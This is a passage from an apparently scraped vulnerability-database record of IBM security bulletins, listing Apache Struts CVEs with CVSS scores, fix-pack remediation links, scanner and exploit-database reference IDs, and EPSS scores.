\nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n** CVEID: **[CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score. 
\nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>) \n** DESCRIPTION: **XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>) \n** DESCRIPTION: **An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base score: 9.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restriction, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score. 
\nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction:: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. 
An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \nIBM Sterling Order Management| 9.5.x \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Sterling Order Management version 10 and if you are running IBM Sterling Order Management version 9.5 a product upgrade must be completed first. IBM Sterling Order Management version 9.5 end of support April 30, 2022.\n\nOrder Management installing Fix Pack29 -[https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29 https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp30](<https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29>)\n\nFix Pack 29 download location - [https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software>)\n\nCreating & 
Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>

On-Premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>

Fix Central Link (**FP details URL**):
[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)

## Workarounds and Mitigations

IBM strongly recommends addressing the vulnerability now by executing above steps in product version 10.0. Version 9.5 is end of support as of April 30, 2022. If you need further clarifications regarding 9.5 end of support, log4j and version 9.5 please contact IBM support.

Published: 2022-09-14T17:45:15 (modified: 2022-09-14T17:45:15)
Source: <https://www.ibm.com/support/pages/node/6620355> (reporter: IBM)
"STRUTS_2_3_15_1.NASL", "STRUTS_2_3_15_1_COMMAND_EXECUTION.NASL", "STRUTS_2_3_15_2.NASL", "STRUTS_2_3_15_2_LOCAL.NASL", "STRUTS_2_3_15_3.NASL", "STRUTS_2_3_16_1.NASL", "STRUTS_2_3_16_1_CLASSLOADER_MANIPULATION.NASL", "STRUTS_2_3_16_1_WIN_LOCAL.NASL", "STRUTS_2_3_16_2.NASL", "STRUTS_2_3_16_2_DOS.NASL", "STRUTS_2_3_16_3.NASL", "STRUTS_2_3_1_1_REAL.NASL", "STRUTS_2_3_20_WIN_LOCAL.NASL", "STRUTS_2_3_24_1_WIN_LOCAL.NASL", "STRUTS_2_3_28_1_RCE.NASL", "STRUTS_2_3_28_1_WIN_LOCAL.NASL", "STRUTS_2_3_28_WIN_LOCAL.NASL", "STRUTS_2_3_29_WIN_LOCAL.NASL", "STRUTS_2_3_4_1.NASL", "STRUTS_2_5_13.NASL", "STRUTS_2_5_22.NASL", "STRUTS_2_5_26.NASL", "STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL", "STRUTS_REST_SHOWCASE_XSS.NASL", "STRUTS_S2-061.NASL", "STRUTS_S2-062.NASL", "STRUTS_SHOWCASE_XSS.NASL", "STRUTS_XWORK_OGNL_CODE_EXECUTION_SAFE.NASL", "STRUTS_XWORK_OGNL_CODE_EXECUTION_SAFE1.NASL", "SUSE_11_LIBMYSQL55CLIENT18-140527.NASL", "VCENTER_OPERATIONS_MANAGER_VMSA_2012-0013.NASL", "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0007.NASL", "VMWARE_VMSA-2012-0013.NASL", "VMWARE_VMSA-2012-0013_REMOTE.NASL", "WEB_APPLICATION_SCANNING_113226"]}, {"type": "openvas", "idList": ["OPENVAS:103558", "OPENVAS:1361412562310103558", "OPENVAS:1361412562310103883", "OPENVAS:1361412562310105910", "OPENVAS:1361412562310107007", "OPENVAS:1361412562310108243", "OPENVAS:1361412562310108626", "OPENVAS:1361412562310108627", "OPENVAS:1361412562310108628", "OPENVAS:1361412562310108629", "OPENVAS:1361412562310121267", "OPENVAS:1361412562310801441", "OPENVAS:1361412562310801663", "OPENVAS:1361412562310802422", "OPENVAS:1361412562310802425", "OPENVAS:1361412562310803837", "OPENVAS:1361412562310803838", "OPENVAS:1361412562310807972", "OPENVAS:1361412562310808021", "OPENVAS:1361412562310808080", "OPENVAS:1361412562310809474", "OPENVAS:1361412562310809475", "OPENVAS:1361412562310811315", "OPENVAS:1361412562310811316", "OPENVAS:1361412562310812011", "OPENVAS:1361412562310850784", "OPENVAS:801441", "OPENVAS:801663", 
"OPENVAS:802422", "OPENVAS:802425", "OPENVAS:803837", "OPENVAS:803838"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2015", "ORACLE:CPUAPR2017", "ORACLE:CPUAPR2021", "ORACLE:CPUAPR2022", "ORACLE:CPUJAN2014-1972949", "ORACLE:CPUJAN2021", "ORACLE:CPUJAN2022", "ORACLE:CPUJUL2015", "ORACLE:CPUJUL2016", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2021", "ORACLE:CPUOCT2013-1899837", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2021"]}, {"type": "osv", "idList": ["OSV:GHSA-265R-PP83-GWW7", "OSV:GHSA-2RVH-Q539-Q33V", "OSV:GHSA-383P-XQXX-RRMP", "OSV:GHSA-3C5C-XRQ4-QHR8", "OSV:GHSA-47QP-8V9G-39HP", "OSV:GHSA-4QGJ-9MVG-3929", "OSV:GHSA-56F8-G68R-J699", "OSV:GHSA-737W-MH58-CXJP", "OSV:GHSA-7GHM-RPC7-P7G5", "OSV:GHSA-8FX9-5HX8-CRHM", "OSV:GHSA-CCP5-GG58-PXFM", "OSV:GHSA-GQQM-564F-VVXQ", "OSV:GHSA-H4V9-JF2R-9H6M", "OSV:GHSA-HMHQ-382Q-MP56", "OSV:GHSA-HRGC-54MV-58GV", "OSV:GHSA-J7H6-XR7G-M2C5", "OSV:GHSA-JC35-Q369-45PV", "OSV:GHSA-M3X6-9V6H-4G28", "OSV:GHSA-MWRX-HX6X-3HHV", "OSV:GHSA-PRJV-JJ26-WF8H", "OSV:GHSA-PVM9-288C-V5WQ", "OSV:GHSA-PW8R-X2QM-3H5M", "OSV:GHSA-Q5Q8-JGHF-3PM3", "OSV:GHSA-RPJ9-R897-WC6Q", "OSV:GHSA-V8J6-6C2R-R27C", "OSV:GHSA-VRWC-QJMW-5RJM", "OSV:GHSA-VWHV-J36G-5RM8", "OSV:GHSA-WHMQ-V94Q-34P9", "OSV:GHSA-WP4H-PVGW-5727", "OSV:GHSA-X5FC-PGPX-59J5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101323", "PACKETSTORM:104227", "PACKETSTORM:113272", "PACKETSTORM:121847", "PACKETSTORM:122541", "PACKETSTORM:122796", "PACKETSTORM:122797", "PACKETSTORM:126445", "PACKETSTORM:136856", "PACKETSTORM:159629", "PACKETSTORM:160108", "PACKETSTORM:160721", "PACKETSTORM:91774"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:FE0BAF7268104D525CC0A2ABC0471C4C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5482AC1594C82A230828023816657B57", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49"]}, {"type": "redhat", "idList": ["RHSA-2019:0910"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-3093", "RH:CVE-2016-4436", "RH:CVE-2017-12611", 
"RH:CVE-2019-0230", "RH:CVE-2019-0233", "RH:CVE-2020-17530", "RH:CVE-2021-31805"]}, {"type": "saint", "idList": ["SAINT:05F171426D41814939EA98ED1A825F67", "SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "SAINT:1D34925730D76AB12F475B2A125AC017", "SAINT:2158B27B9EAB9B393EED3784C4096BC1", "SAINT:279F8312DEF0028C5D034325A810E73D", "SAINT:2FE5CCE51B64707F8D205A80240A6467", "SAINT:30B69DA796085BC3E3B1C78E90D5EEF1", "SAINT:3C8676675136ED40AD965CF40F5B034D", "SAINT:4558D86B32E9DFCF5B5EEBFCAB072C31", "SAINT:46C06C664B1E5C691A77B2FC04327D68", "SAINT:4B122F6299581540A8429BAA06656ACE", "SAINT:52FE4CC3610DB129C039F9F864818929", "SAINT:61E99B83D8C03F67350245D1B8BDC99C", "SAINT:6A7FE32298A470E879AB2C759F6C43EB", "SAINT:6E895851192B9E656298357DF24A9556", "SAINT:7B263B551E3799A3C795713D657E1BD2", "SAINT:7BC59B3330A7820A216EA06973B8F0C8", "SAINT:828C60321F2ABC177EBA08F435872B1B", "SAINT:891A42933A0DE986694E3B7D51B3F2F1", "SAINT:8B8924409E9AFE277FF0998CBA641AF8", "SAINT:AE1DA80E6B0E4C12B5D781794166897B", "SAINT:C0B4D5468890CF90769399ACED5F1513", "SAINT:C2F1CFAE3C24599334963A0CD12F3E0B", "SAINT:D1B88155F516D415CE4F67A190458DDB", "SAINT:D5D4A387859B0AFB11066636D506EF3B"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26351", "SECURITYVULNS:DOC:29765", "SECURITYVULNS:DOC:29766", "SECURITYVULNS:DOC:30528", "SECURITYVULNS:DOC:30529", "SECURITYVULNS:DOC:30568", "SECURITYVULNS:DOC:30825", "SECURITYVULNS:VULN:11662", "SECURITYVULNS:VULN:13263", "SECURITYVULNS:VULN:13378", "SECURITYVULNS:VULN:13423", "SECURITYVULNS:VULN:13537", "SECURITYVULNS:VULN:13701", "SECURITYVULNS:VULN:13714", "SECURITYVULNS:VULN:13836", "SECURITYVULNS:VULN:14393", "SECURITYVULNS:VULN:14601"]}, {"type": "seebug", "idList": ["SSV:19954", "SSV:20526", "SSV:20538", "SSV:30098", "SSV:60807", "SSV:60812", "SSV:60836", "SSV:60906", "SSV:60909", "SSV:61048", "SSV:61049", "SSV:61709", "SSV:69390", "SSV:91389", "SSV:96425"]}, {"type": "suse", "idList": ["SUSE-SU-2014:0769-1"]}, {"type": "thn", "idList": 
["THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:7FD924637D99697D78D53283817508DA"]}, {"type": "threatpost", "idList": ["THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:40B4CEF304ADBCA0734F292661E7810B", "THREATPOST:9C73922123182D0FF51BB36348E2ED36", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:F3CCF4A5ECFE4B0E862CEE7C1076E03E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-1870", "UB:CVE-2011-5057", "UB:CVE-2012-0391", "UB:CVE-2012-0392", "UB:CVE-2012-0393", "UB:CVE-2012-0838", "UB:CVE-2012-1006", "UB:CVE-2012-4386", "UB:CVE-2012-4387", "UB:CVE-2013-1965", "UB:CVE-2013-1966", "UB:CVE-2013-2134", "UB:CVE-2013-2135", "UB:CVE-2013-2251", "UB:CVE-2013-4310", "UB:CVE-2013-4316", "UB:CVE-2014-0094", "UB:CVE-2014-0112", "UB:CVE-2014-0113", "UB:CVE-2014-0116", "UB:CVE-2014-7809", "UB:CVE-2015-2992", "UB:CVE-2015-5169", "UB:CVE-2015-5209", "UB:CVE-2016-3081", "UB:CVE-2016-3082", "UB:CVE-2016-3093", "UB:CVE-2016-4003", "UB:CVE-2016-4436", "UB:CVE-2017-12611", "UB:CVE-2019-0230", "UB:CVE-2019-0233", "UB:CVE-2020-17530", "UB:CVE-2021-31805"]}, {"type": "veracode", "idList": ["VERACODE:26331", "VERACODE:26332", "VERACODE:28516", "VERACODE:35070", "VERACODE:5038", "VERACODE:758"]}, {"type": "vmware", "idList": ["VMSA-2011-0005", "VMSA-2011-0005.3", "VMSA-2012-0013", "VMSA-2012-0013.2", "VMSA-2014-0007", "VMSA-2014-0007.2"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851"]}, {"type": "zdt", "idList": ["1337DAY-ID-20837", "1337DAY-ID-21032", "1337DAY-ID-22210", "1337DAY-ID-25410", "1337DAY-ID-27400", "1337DAY-ID-30271", "1337DAY-ID-35084", "1337DAY-ID-35263", "1337DAY-ID-35571"]}]}, "score": {"value": 10.3, "vector": "NONE"}, "epss": [{"cve": "CVE-2010-1870", "epss": 0.03864, "percentile": 0.90577, "modified": "2023-05-01"}, {"cve": "CVE-2011-1772", "epss": 0.0043, "percentile": 0.70701, "modified": "2023-05-02"}, {"cve": 
"CVE-2011-5057", "epss": 0.01033, "percentile": 0.81681, "modified": "2023-05-02"}, {"cve": "CVE-2012-0391", "epss": 0.14646, "percentile": 0.94907, "modified": "2023-05-02"}, {"cve": "CVE-2012-0392", "epss": 0.97059, "percentile": 0.99598, "modified": "2023-05-02"}, {"cve": "CVE-2012-0393", "epss": 0.94317, "percentile": 0.98733, "modified": "2023-05-02"}, {"cve": "CVE-2012-0838", "epss": 0.01889, "percentile": 0.86714, "modified": "2023-05-02"}, {"cve": "CVE-2012-1006", "epss": 0.61374, "percentile": 0.97244, "modified": "2023-05-02"}, {"cve": "CVE-2012-4386", "epss": 0.00268, "percentile": 0.62789, "modified": "2023-05-02"}, {"cve": "CVE-2012-4387", "epss": 0.02305, "percentile": 0.88085, "modified": "2023-05-02"}, {"cve": "CVE-2013-1965", "epss": 0.00813, "percentile": 0.79334, "modified": "2023-05-02"}, {"cve": "CVE-2013-1966", "epss": 0.01858, "percentile": 0.86601, "modified": "2023-05-01"}, {"cve": "CVE-2013-2115", "epss": 0.00595, "percentile": 0.75164, "modified": "2023-05-02"}, {"cve": "CVE-2013-2134", "epss": 0.97071, "percentile": 0.99607, "modified": "2023-05-01"}, {"cve": "CVE-2013-2135", "epss": 0.95739, "percentile": 0.99069, "modified": "2023-05-02"}, {"cve": "CVE-2013-2248", "epss": 0.97324, "percentile": 0.99778, "modified": "2023-05-02"}, {"cve": "CVE-2013-2251", "epss": 0.97432, "percentile": 0.99889, "modified": "2023-05-01"}, {"cve": "CVE-2013-4310", "epss": 0.02037, "percentile": 0.87265, "modified": "2023-05-02"}, {"cve": "CVE-2013-4316", "epss": 0.00871, "percentile": 0.80033, "modified": "2023-05-02"}, {"cve": "CVE-2014-0094", "epss": 0.97175, "percentile": 0.99659, "modified": "2023-05-01"}, {"cve": "CVE-2014-0112", "epss": 0.97404, "percentile": 0.9986, "modified": "2023-05-01"}, {"cve": "CVE-2014-0113", "epss": 0.96867, "percentile": 0.99494, "modified": "2023-05-02"}, {"cve": "CVE-2014-0116", "epss": 0.00865, "percentile": 0.79967, "modified": "2023-05-02"}, {"cve": "CVE-2014-7809", "epss": 0.00192, "percentile": 0.55316, "modified": 
"2023-05-02"}, {"cve": "CVE-2015-2992", "epss": 0.00725, "percentile": 0.77867, "modified": "2023-05-01"}, {"cve": "CVE-2015-5169", "epss": 0.00481, "percentile": 0.72282, "modified": "2023-05-02"}, {"cve": "CVE-2015-5209", "epss": 0.00305, "percentile": 0.65255, "modified": "2023-05-02"}, {"cve": "CVE-2016-3081", "epss": 0.97524, "percentile": 0.99976, "modified": "2023-05-01"}, {"cve": "CVE-2016-3082", "epss": 0.95903, "percentile": 0.99122, "modified": "2023-05-02"}, {"cve": "CVE-2016-3093", "epss": 0.02732, "percentile": 0.88975, "modified": "2023-05-02"}, {"cve": "CVE-2016-4003", "epss": 0.01905, "percentile": 0.86789, "modified": "2023-05-02"}, {"cve": "CVE-2016-4436", "epss": 0.02365, "percentile": 0.88225, "modified": "2023-05-02"}, {"cve": "CVE-2017-12611", "epss": 0.97358, "percentile": 0.99804, "modified": "2023-05-02"}, {"cve": "CVE-2019-0230", "epss": 0.87271, "percentile": 0.98074, "modified": "2023-05-01"}, {"cve": "CVE-2019-0233", "epss": 0.12368, "percentile": 0.94549, "modified": "2023-05-01"}, {"cve": "CVE-2020-17530", "epss": 0.96641, "percentile": 0.99383, "modified": "2023-05-01"}], "vulnersScore": 10.3}, "_state": {"dependencies": 1687588226, "score": 1687589890, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "4779a8713d8c61f617b9a179f6b7958a"}, "affectedSoftware": [{"version": "9.5", "operator": "eq", "name": "sterling selling and fulfillment suite"}, {"version": "10.", "operator": "eq", "name": "sterling selling and fulfillment suite"}]}
{"ibm": [{"lastseen": "2023-06-24T05:58:27", "description": "## Summary\n\nApache Struts is used by IBM Call Center as part of its web application framework used for creating Java EE web applications. It is vulnerable to various CVEs, listed below. We recommend upgrading to the latest supported version of Struts that was released as part of the latest FixPack 12.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score. \nCVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score. 
